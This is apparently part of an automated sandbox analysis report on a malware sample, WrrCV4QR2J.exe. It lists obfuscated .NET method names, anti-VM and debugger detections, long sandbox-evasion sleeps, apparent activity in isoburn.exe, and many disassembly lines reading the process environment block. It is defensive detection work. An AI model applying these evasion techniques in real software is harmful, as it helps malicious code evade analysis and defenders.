            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, iQx60RHa0qKYPf3Z8O.csHigh entropy of concatenated method names: 'fQstmI0fBW', 'e7ItfYhtqw', 'vDWIl5lcJa', 'cruIqw4PPM', 'omYt4MJYrH', 'j0ltpT7VVt', 'gpftR6aOlM', 'dwNtV6sMBh', 'poJtTO3qa3', 'hH9tSp4uZw'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, S3Mfu2L0P6ZYqF8JDx.csHigh entropy of concatenated method names: 'f3eOcvDc0B', 'gRuOBOtO0n', 'zABOhBbqok', 'IvRhfy9Rn7', 'n3DhzWmxMs', 'MONOlb1beT', 'cyWOqCdHxl', 'iwSO5sC9KA', 'yIYOAjyLiC', 'slNOKS7cW3'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, MP5NrvZQ26MmltX2bw.csHigh entropy of concatenated method names: 'cZOW2y4bYO', 'kGdWy9JsmQ', 'CIZBjPdnAg', 'kkVBQL3nEc', 'QRwB8DfX4t', 'J44BEFc2Rd', 'AXsBL6tjme', 'ERJBxYetUK', 'eA3BiApgAF', 'AReBP3fwKB'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, RbqhOUqA7QhOoEjcRkO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iuv0VtqOnh', 'slX0TU0wwn', 'ljB0SECqEo', 'EUp0gcUbrd', 'Yv00uNUrf3', 'DVp0Hq96Dl', 'wit0Fvtxjj'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, GJEHX3fv9BeMEunr8v.csHigh entropy of concatenated method names: 'uH6Cq5ow9h', 'TEFCA6iDCo', 'Ho3CK0HqK5', 'ckQCcBhfXv', 'UpyCkOu31i', 'hfrCWCVBZP', 'f2fCh8ICet', 'V1CIFOGWFO', 'TKBImRwVPK', 'K6AIDd9U5v'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, GCdZAjBqwOnwwqiAmv.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Vca5D9x1sc', 'w2j5fLRVGS', 'Yn35zSjEY4', 'ExHAlrhjl1', 'C1gAqIxplb', 'SZpA5HHY1Q', 'JJOAAR5hKc', 'g0vgFCBxJcCTMOyTqyX'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.csHigh entropy of concatenated method names: 'FauAXwqwxA', 'QwtAcMfrVd', 'UB9Ak3cwLX', 'xkOABy0YT0', 'VUXAWTCGs3', 'xlQAhgtp3n', 'dwLAO4ufc4', 'uSJAYNRDBM', 'orpAn8xTK0', 'pdvAeXKVOu'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, QgjsJYrkQb4pO4ExRL.csHigh entropy of concatenated method names: 'ORuBvVxDjh', 'a5WBaqqp3e', 'B1DB3jPqN8', 'kDqBrRgQP1', 'OI2BssjTpr', 'QvsBJc4EsI', 'skgBtC7dh7', 'hUIBI9q64d', 'JVABCJUtNk', 'C4IB0PeOm9'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, tm1DnHztQw0jTPAyiw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nSHCwMCQey', 'SydCsj6yxM', 'bs5CJDx4YK', 'ocSCtqNPNn', 'PKgCIAttT0', 'NSvCCWHSuI', 'SkVC02tA1p'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, n4y6KK7Vo3yIB06LCb.csHigh entropy of concatenated method names: 'XNuhXpmUl6', 'zMUhkIABI0', 'zj2hW6gZZX', 'R6uhO6sfv6', 'yjThY6FFc4', 'aUFWuDPPVQ', 'k5eWHWmUZ1', 'Bu5WFZQ7CU', 'gKpWmOu8G7', 'yrAWDvq7dT'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, CQsihPRp2QqDfJ2WSG.csHigh entropy of concatenated method names: 'BNsw3YVVaS', 'F65wrrRnDL', 'wDZw7WcFdk', 'PppwdAGxJE', 'qVkwQGeYgn', 'PyMw801swy', 'Ue6wLESeqI', 'Ykowx05OXQ', 'rgrwPOoZTP', 'q4iw47g68E'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, GnP3Iym1crZI6i4xA4.csHigh entropy of concatenated method names: 'dRwIcDbpt2', 'oavIkQ41Yn', 'pvFIBfAW3l', 'ca6IWVxWLP', 'ew8IhUo8th', 'oYFIOwoX4r', 'ERWIYGybIC', 'QpTInfRjBE', 'WueIe3gfNd', 'w2RIN7xlYa'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, RSWgxp5kdrRP34y6Vl.csHigh entropy of concatenated method names: 'K1q6bqlRG', 'YuXvfvPVN', 'cFraLwpgk', 'iFuyNTKIj', 'tbpreUUth', 'elrZw0Qkt', 'V1xbuhksBZHS3doqyW', 'YKtbkNfeVsmjDISpgJ', 'YciI2bsM9', 'HD10x6K3T'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, ADARcmkG3iF4hU5dFs.csHigh entropy of concatenated method names: 'Dispose', 'oANqDsOhFo', 'oF35dJLQt0', 'k1Booq37m8', 'D7nqfP3Iy1', 'frZqzI6i4x', 'ProcessDialogKey', 'c485lXwPDC', 'qDf5qJFfBe', 'MD9557JEHX'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, iCCk6PiX0UnT0YF2Ph.csHigh entropy of concatenated method names: 'O1UOo4utxI', 'xaHObRiZI6', 's05O6k2Er2', 'mchOvlNdJN', 'p1DO26fxXO', 'lUmOaHss6D', 'o6HOydgXJC', 'fhEO3iDWQr', 'ni7OrXPfhb', 'jGlOZiCo4j'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, HtYtbfVAJQd3LvHq3J.csHigh entropy of concatenated method names: 'oTxsPJXxpQ', 'lGZsp8YUpw', 'SaysV8sjwa', 'W24sTCoCtf', 'jaXsdTxQHi', 'fo6sjH7TIW', 'cNusQS9vEP', 'mnGs8iwwYy', 'T4GsEOsC5W', 'tgUsLDfi5g'
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: WrrCV4QR2J.exe PID: 4480, type: MEMORYSTR
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E rdtsc 2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9749Jump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeAPI coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe TID: 2816Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384Thread sleep count: 223 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384Thread sleep time: -446000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384Thread sleep count: 9749 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384Thread sleep time: -19498000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028EC280 FindFirstFileW,FindNextFileW,FindClose,4_2_028EC280
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121097965.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E rdtsc 2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004173F3 LdrLoadDll,2_2_004173F3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C156 mov eax, dword ptr fs:[00000030h]2_2_0156C156
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576154 mov eax, dword ptr fs:[00000030h]2_2_01576154
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576154 mov eax, dword ptr fs:[00000030h]2_2_01576154
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01604144 mov eax, dword ptr fs:[00000030h]2_2_01604144
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01604144 mov eax, dword ptr fs:[00000030h]2_2_01604144
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01604144 mov ecx, dword ptr fs:[00000030h]2_2_01604144
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01604144 mov eax, dword ptr fs:[00000030h]2_2_01604144
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01604144 mov eax, dword ptr fs:[00000030h]2_2_01604144
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01608158 mov eax, dword ptr fs:[00000030h]2_2_01608158
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov ecx, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov ecx, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov ecx, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov eax, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E10E mov ecx, dword ptr fs:[00000030h]2_2_0161E10E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01630115 mov eax, dword ptr fs:[00000030h]2_2_01630115
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161A118 mov ecx, dword ptr fs:[00000030h]2_2_0161A118
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161A118 mov eax, dword ptr fs:[00000030h]2_2_0161A118
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161A118 mov eax, dword ptr fs:[00000030h]2_2_0161A118
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161A118 mov eax, dword ptr fs:[00000030h]2_2_0161A118
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A0124 mov eax, dword ptr fs:[00000030h]2_2_015A0124
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016461E5 mov eax, dword ptr fs:[00000030h]2_2_016461E5
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE1D0 mov eax, dword ptr fs:[00000030h]2_2_015EE1D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE1D0 mov eax, dword ptr fs:[00000030h]2_2_015EE1D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE1D0 mov ecx, dword ptr fs:[00000030h]2_2_015EE1D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE1D0 mov eax, dword ptr fs:[00000030h]2_2_015EE1D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE1D0 mov eax, dword ptr fs:[00000030h]2_2_015EE1D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016361C3 mov eax, dword ptr fs:[00000030h]2_2_016361C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016361C3 mov eax, dword ptr fs:[00000030h]2_2_016361C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A01F8 mov eax, dword ptr fs:[00000030h]2_2_015A01F8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F019F mov eax, dword ptr fs:[00000030h]2_2_015F019F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F019F mov eax, dword ptr fs:[00000030h]2_2_015F019F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F019F mov eax, dword ptr fs:[00000030h]2_2_015F019F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F019F mov eax, dword ptr fs:[00000030h]2_2_015F019F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A197 mov eax, dword ptr fs:[00000030h]2_2_0156A197
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A197 mov eax, dword ptr fs:[00000030h]2_2_0156A197
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A197 mov eax, dword ptr fs:[00000030h]2_2_0156A197
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B0185 mov eax, dword ptr fs:[00000030h]2_2_015B0185
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614180 mov eax, dword ptr fs:[00000030h]2_2_01614180
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614180 mov eax, dword ptr fs:[00000030h]2_2_01614180
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162C188 mov eax, dword ptr fs:[00000030h]2_2_0162C188
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162C188 mov eax, dword ptr fs:[00000030h]2_2_0162C188
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572050 mov eax, dword ptr fs:[00000030h]2_2_01572050
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6050 mov eax, dword ptr fs:[00000030h]2_2_015F6050
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159C073 mov eax, dword ptr fs:[00000030h]2_2_0159C073
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E016 mov eax, dword ptr fs:[00000030h]2_2_0158E016
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E016 mov eax, dword ptr fs:[00000030h]2_2_0158E016
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E016 mov eax, dword ptr fs:[00000030h]2_2_0158E016
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E016 mov eax, dword ptr fs:[00000030h]2_2_0158E016
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606030 mov eax, dword ptr fs:[00000030h]2_2_01606030
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F4000 mov ecx, dword ptr fs:[00000030h]2_2_015F4000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01612000 mov eax, dword ptr fs:[00000030h]2_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A020 mov eax, dword ptr fs:[00000030h]2_2_0156A020
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C020 mov eax, dword ptr fs:[00000030h]2_2_0156C020
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F20DE mov eax, dword ptr fs:[00000030h]2_2_015F20DE
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C0F0 mov eax, dword ptr fs:[00000030h]2_2_0156C0F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B20F0 mov ecx, dword ptr fs:[00000030h]2_2_015B20F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0156A0E3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015780E9 mov eax, dword ptr fs:[00000030h]2_2_015780E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F60E0 mov eax, dword ptr fs:[00000030h]2_2_015F60E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016080A8 mov eax, dword ptr fs:[00000030h]2_2_016080A8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016360B8 mov eax, dword ptr fs:[00000030h]2_2_016360B8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016360B8 mov ecx, dword ptr fs:[00000030h]2_2_016360B8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157208A mov eax, dword ptr fs:[00000030h]2_2_0157208A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov eax, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov eax, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov eax, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov ecx, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov eax, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F035C mov eax, dword ptr fs:[00000030h]2_2_015F035C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F2349 mov eax, dword ptr fs:[00000030h]2_2_015F2349
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161437C mov eax, dword ptr fs:[00000030h]2_2_0161437C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163A352 mov eax, dword ptr fs:[00000030h]2_2_0163A352
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01618350 mov ecx, dword ptr fs:[00000030h]2_2_01618350
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C310 mov ecx, dword ptr fs:[00000030h]2_2_0156C310
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01590310 mov ecx, dword ptr fs:[00000030h]2_2_01590310
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA30B mov eax, dword ptr fs:[00000030h]2_2_015AA30B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA30B mov eax, dword ptr fs:[00000030h]2_2_015AA30B
